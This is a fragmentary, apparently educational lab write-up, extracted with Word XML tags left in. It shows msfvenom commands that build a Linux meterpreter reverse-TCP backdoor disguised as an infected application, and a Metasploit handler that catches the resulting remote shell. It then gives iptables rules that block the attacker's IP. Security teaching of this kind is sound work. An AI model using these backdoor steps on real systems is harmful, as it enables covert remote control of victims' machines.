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 did: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this example used an infected application to install a backdoor for Ubuntu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(For Windows, we can use the pdf exploit)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 an infected application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msfvenom </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="660033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linux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x86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meterpreter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reverse_tcp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="007800"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST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 IP Address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800"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT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443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33"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-f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elf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shell.elf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application on our target computer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hacker’s computer, run the metasploit framework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use exploit/multi/handler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set PAYLOAD linux/x86/meterpreter/reverse_tcp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set LHOST &lt;Own IP Address&gt;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set LPORT 443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exploit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here, we have a meterpreter console.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? to list all available commands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Blocking this using iptables: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we identify the source/destination where the keylogger is sending information, we can block that ip address.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Extremely inefficient, need to parse packets until we find suspicious activity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iptables -A INPUT -s 192.168.1.193 -j DROP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iptables -A OUTPUT -s 192.168.1.193 -j DROP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iptables -L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confirm out filters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attacker’s computer, we run the exploit again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time it hangs on waiting for our target computer forever (As if exploit was never run)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https://netsec.ws/?p=331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tsec.ws/?p=3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